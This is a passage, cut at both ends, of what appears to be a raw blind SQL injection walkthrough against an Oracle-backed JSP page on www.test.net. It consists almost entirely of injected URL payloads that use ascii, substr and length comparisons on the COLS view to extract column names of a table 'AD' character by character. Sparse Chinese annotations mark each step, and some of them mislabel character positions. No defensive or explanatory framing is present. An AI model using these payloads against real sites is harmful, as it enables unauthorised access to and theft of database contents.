99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1)) ? 以下为猜解第一列的第一个字段名CLASS的长度为:5 www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 7>nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) ? 以下为猜解第一列第一个字段的第一位为:C www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 68>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 66=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 66>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) ? 以下为猜解第一列第一个字段的第一位为:L www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) ? 以下为猜解第一列第一个字段的第三位为:A www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 83>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1)) ? 以下为猜解第二列: www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_N
